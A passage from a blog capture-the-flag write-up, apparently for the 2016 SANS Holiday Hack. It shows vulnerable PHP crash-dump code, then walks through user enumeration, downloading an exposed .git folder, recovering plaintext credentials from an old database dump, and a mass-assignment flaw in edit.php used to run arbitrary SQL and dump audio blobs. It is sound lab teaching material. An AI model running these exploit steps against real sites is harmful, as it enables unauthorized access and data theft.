"); } # Process the JSON. if ( ! isset( $obj['operation']) or ( $obj['operation'] !== "WriteCrashDump" and $obj['operation'] !== "ReadCrashDump")) { die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

"); } if ( isset($obj['data'])) { if ($obj['operation'] === "WriteCrashDump") { # Write a new crash dump to disk processCrashDump($obj['data']); } elseif ($obj['operation'] === "ReadCrashDump") { # Read a crash dump back from disk readCrashdump($obj['data']); } } else { # data key unset die("Fatal error! JSON key 'data' must be set.

"); } function processCrashdump($crashdump) { $basepath = "/var/www/html/docs/"; $outputfilename = tempnam($basepath, "crashdump-"); unlink($outputfilename); $outputfilename = $outputfilename . ".php"; $basename = basename($outputfilename); $crashdump_encoded = "<php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');"; file_put_contents($outputfilename, $crashdump_encoded); print <<<END { "success" : true, "folder" : "docs", "crashdump" : "$basename" } END; } function readCrashdump($requestedCrashdump) { $basepath = "/var/www/html/docs/"; chdir($basepath); if ( ! isset($requestedCrashdump['crashdump'])) { die("Fatal error! JSON key 'crashdump' must be set.

"); } if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) { die("Fatal error! crashdump value duplicate '.php' extension detected.

"); } else { require($requestedCrashdump['crashdump'] . '.php'); } } ?>

And right at the top of the page a link to our next mp3.

http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3

https://techanarchy.net/assets/images/2016/12/discombobulated-audio-6-XyzE3N9YqKNH.mp3

We are told there is another audio file on the analytics site that we need to collect after logging in.

After logging in with the guest account as well as the mp3 there are some options to query data from one of two analytics sets. Launch and Usage. We also have the option to save these queries as reports.

the obvious thing to try here is sql injection, i try some basic injection techniques but nothing seems to work, i even get heavy handed and throw sqlmap at it with no luck.

What about trying to logon as another user? Fortunately it is really easy to enumerate users from the login page. If a user doesn’t exist we are presented with:

{"result":401,"msg":"No such user!"}

And if we find a valid user with an incorrect password we get:

{"result":401,"msg":"Bad password!"}

This lets us figure out there is an 'administrator' account but we don't know the password for it. After trying some words that had been picked up through the other challenges nothing was working and i was contemplating a brute force attack with hydra, especially as the response is easy to read. Before i did this I was reading back though the notes i had been making to see if i had missed something, turns out i had.

The first thing i would do on each IP was to run an NMAP scan. And the nmap scan had returned an interesting item i had completely overlooked.

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA) | 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA) |_ 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA) 443/tcp open ssl/http nginx 1.6.2 | http-git: | 104.198.252.157:443/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Finishing touches (style, css, etc) | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: nginx/1.6.2 | http-title: Sprusage Usage Reporter! |_Requested resource was login.php

nmap had found a Git repository. we can use wget to pull down all the files.

wget -r --no-parent https://analytics.northpolewonderland.com/.git/ which gives us: Downloaded: 314 files, 1003K in 0.8s (1.25 MB/s)

With the git folder pulled down i clean up the wget by removing all the generated index.html pages.

root@kali:~# cd analytics.northpolewonderland.com/.git root@kali:~/analytics.northpolewonderland.com/.git# find . -name index.html -exec rm {} +

As this is a git repo lets see if we can read the git log.

Yes we can and that’s a lot of information.

root@kali:~/analytics.northpolewonderland.com/.git# git log commit 16ae0cbe2630a87c0470b9a864bf048e813826db Author: me <me@example.org> Date: Fri Dec 2 19:42:15 2016 +0000 Finishing touches (style, css, etc) commit 106079e728c97ebea387042a2e076fab62952e1e Author: me <me@example.org> Date: Tue Nov 22 17:51:52 2016 -0800 Got rid of mysqli_fetch_all(), which isn't widely supported commit e46b41e391ee0e9f4afab7880982501ac1471fb4 Author: me <me@example.org> Date: Mon Nov 21 21:19:11 2016 -0800 HTML escape more output values on the test page commit 935d79726e13ab65c3b5baa4d925de86059057d4 Author: me <me@example.org> Date: Mon Nov 21 21:18:49 2016 -0800 HTML escape an output value on the test page commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31 Author: me <me@example.org> Date: Mon Nov 21 21:15:08 2016 -0800 Fix database dump commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0 Author: me <me@example.org> Date: Mon Nov 21 21:14:36 2016 -0800 Saved queries now save the query object instead of the results commit 45edadc1850c3894ab8850d1d77dca9a074a3a6a Author: me <me@example.org> Date: Mon Nov 21 20:50:40 2016 -0800 Update README.md to reflect the actual current state commit 885ec6a4e870ce983aecde3a4f0e398b6a76615f Author: me <me@example.org> Date: Mon Nov 21 20:49:23 2016 -0800 Update report.php to log actual data to the database instead of static strings commit 58c900fd53fced0d588e00e23c26cb8465eed498 Author: me <me@example.org> Date: Fri Nov 18 22:35:53 2016 -0800 Add view.php commit 43970092ea851cff05e44aba3e0a67eb351304f3 Author: me <me@example.org> Date: Fri Nov 18 22:20:08 2016 -0800 Remove unnecessary data from the database dump commit 1908b71d42bce15345cabb7a63f57b5c79b85d15 Author: me <me@example.org> Date: Fri Nov 18 22:19:21 2016 -0800 Update the database dump commit 0778ac7de1d7ff8ae46ebabdee33a340ab9506f3 Author: me <me@example.org> Date: Fri Nov 18 22:10:10 2016 -0800 Reports can now be saved commit 1562064538562f077d388044e344e3c2d85450d7 Author: me <me@example.org> Date: Fri Nov 18 21:39:30 2016 -0800 Add a fairly complex query page for looking up records commit 259d406f3f2345b50338d54a53efa36dd08f6f20 Author: me <me@example.org> Date: Fri Nov 18 19:51:47 2016 -0800 Add a header, a footer, and a logout page commit 2689a45ab9c38d92675660b9113fc173a0ccf129 Author: me <me@example.org> Date: Mon Nov 14 20:34:42 2016 -0800 Fix the database dump commit cf5f27b161f53d62f97ad6ebc648701288a2ea89 Author: me <me@example.org> Date: Mon Nov 14 20:33:27 2016 -0800 Change the database and application/test script to use the real field names instead of fake names commit 6ab9fe6ec3de2e28b79108ff5110643e9ba32478 Author: me <me@example.org> Date: Sun Nov 13 21:13:20 2016 -0800 Add login to the HTML side of things commit 02e8d14ffa8910bfd5365ff36eb96bcd7efc4409 Author: me <me@example.org> Date: Sun Nov 13 20:27:31 2016 -0800 Add a HTML login page, and refactor a little to make check_user() usable by both JSON and HTML commit f0d28ed3cc39538a6c415789408ef3f24ded959c Author: me <me@example.org> Date: Sun Nov 13 20:06:13 2016 -0800 Move some functions into this_is_json.php commit d9636a3d648e617fcb92055dea63ac2469f67c84 Author: me <me@example.org> Date: Sun Nov 13 19:22:22 2016 -0800 Small authentication fix commit 5f0c135e1479d865945577c0a70d0cf39e49cdc7 Author: me <me@example.org> Date: Sun Nov 13 19:19:32 2016 -0800 Add authentication commit 420f433fe33d14abac5c3a588c3e753d0d71d50d Author: me <me@example.org> Date: Sun Nov 13 18:37:10 2016 -0800 Add some basic write-to-the-database functionality commit bb2646691fc9f6bf5f1a0ade746b28f8147ffa48 Author: me <me@example.org> Date: Sun Nov 13 18:25:23 2016 -0800 Add a bit of database functionality commit 1057b70e7681f44aac2789e26a2b714327d8c203 Author: me <me@example.org> Date: Sun Nov 13 18:11:31 2016 -0800 Add a script to test the API commit d63a7e0df35ad525fa40eceae67be5b27215ece8 Author: me <me@example.org> Date: Sun Nov 13 18:10:45 2016 -0800 Added the start of a reporting page

But we still don’t have any source code which is what i really want so i can find the final audio file.

I can’t check out a branch git complains about a work tree. Looking at all the contents of the folder we have, we can see an objects directory that contains a lot of files with seeming random data. As it turns out these are git objects, every time a file is created or modifed it gets an object file with contains the content of the file and some meta data. Even better for us there are ways to recover the data if all we have are the objects directory.

We initialize an empty git repository, copy in our objects directory, use gits built in repair functionality then checkout a branch by its commit hash.

thehermit@TECHANARCHY:~$ mkdir tempgit thehermit@TECHANARCHY:~$ cd tempgit thehermit@TECHANARCHY:~/tempgit$ git init Initialised empty Git repository in /home/thehermit/tempgit/.git/ thehermit@TECHANARCHY:~/tempgit$ cd .git thehermit@TECHANARCHY:~/tempgit/.git$ cp -R ../../analytics.northpolewonderland.com/.git/objects . thehermit@TECHANARCHY:~/tempgit/.git$ cd .. thehermit@TECHANARCHY:~/tempgit$ git fsck --full notice: HEAD points to an unborn branch (master) Checking object directories: 100% (256/256), done. notice: No default references dangling commit 16ae0cbe2630a87c0470b9a864bf048e813826db dangling blob 7b9389b70b24166f782b755d960c7b017f78719d thehermit@TECHANARCHY:~/tempgit$ git checkout 16ae0cbe2630a87c0470b9a864bf048e813826db Note: checking out '16ae0cbe2630a87c0470b9a864bf048e813826db'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example: git checkout -b new_branch_name HEAD is now at 16ae0cb... Finishing touches (style, css, etc) thehermit@TECHANARCHY:~/tempgit$ ls crypto.php edit.php getaudio.php js mp3.php report.php this_is_html.php view.php css fonts header.php login.php query.php sprusage.sql this_is_json.php db.php footer.php index.php logout.php README.md test uuid.php thehermit@TECHANARCHY:~/tempgit$

Now we can see the source for all the files, including an SQL file. Checking the file we can see the schema for all the tables, including an audio table.

``sql DROP TABLE IF EXISTS audio; /!40101 SET @saved_cs_client = @@character_set_client */; /!40101 SET character_set_client = utf8 /; CREATE TABLE audio ( id varchar(36) NOT NULL, username varchar(32) NOT NULL, filename varchar(32) NOT NULL, mp3 MEDIUMBLOB NOT NULL, PRIMARY KEY (id) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /!40101 SET character_set_client = @saved_cs_client */;

Sadly the sprusage.sql file only contains the database schema it doesn't contain any of the table data. Or at least now it doesn't. One of the commits we saw from the git history was 'Remove unnecessary data from the database dump' We can jump to the repository at a commit before this point and see what is contained in this file.

git checkout 1908b71d42bce15345cabb7a63f57b5c79b85d15

The audio table did not exist at this point in the repo but we did find the administrator account

-- -- Dumping data for table `users` -- LOCK TABLES `users` WRITE; /*!40000 ALTER TABLE `users` DISABLE KEYS */; INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67'); /*!40000 ALTER TABLE `users` ENABLE KEYS */;

Which still works :)

After logging in with the administrator account we notice the MP3 link we had before is now replaced with an Edit link. Fortunately we have the source for all these pages so we don’t need to stumble around. (Make sure to checkout the latest version of the git)

Checking ‘getaudio’ and ‘mp3’ php files, it seems like its pretty well locked to only giving out the guest mp3 file. All the php files seem to be secure against SQL injection, which matches my previous experience. So lets have a look at our new edit.php file.

On the surface of things it looks pretty simple. It lets us update the Name and Description for any stored report. We can confirm this by running a query and saving the report and then using the edit page with the report ID we just generated.

But how does this help us?

When you take a closer look at the php page and the output you notice that the new SQL values are not being set by name. Its a for loop iterating over the GET parameters and checking to see if they are valid column names. Name and description are valid so are updated but its also checking for a field called query, which is not included in the HTML form. Lets create a new request that contains something in this query field.

Worth a shot. https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT * FROM audio

The output suggest that the update was successful.

Checking for id... Yup! Checking for name... Yup! Checking for description... Yup! Checking for query... Yup! UPDATE `reports` SET `id`='f73d5f04-ebca-439c-822a-4ad1214803e3', `name`='a', `description`='b', `query`='SELECT * FROM audio' WHERE `id`='f73d5f04-ebca-439c-822a-4ad1214803e3'Update complete! but how do we view the results of our query? Lets take a look at the report page using the View query - https://analytics.northpolewonderland.com/view.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3

And there is the output from our query.

We can tell from the sql file that the mp3 is stored as a blob in the db itself not as a file on disk, and we know that we cant get our mp3 using the getauadio function as that’s locked to the guest track. My first thought is to use INTO OUTFILE but that function doesn’t seem to be enabled or working.

After reading up on exporting data from MySQL i found a function that might help TO_BASE64() which does as it says on the tin, displays the column as base64 data.

With this in hand we create a new query.

SELECT username,filename,TO_BASE64(mp3) from audio https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT%20username,filename,TO_BASE64(mp3)%20from%20audi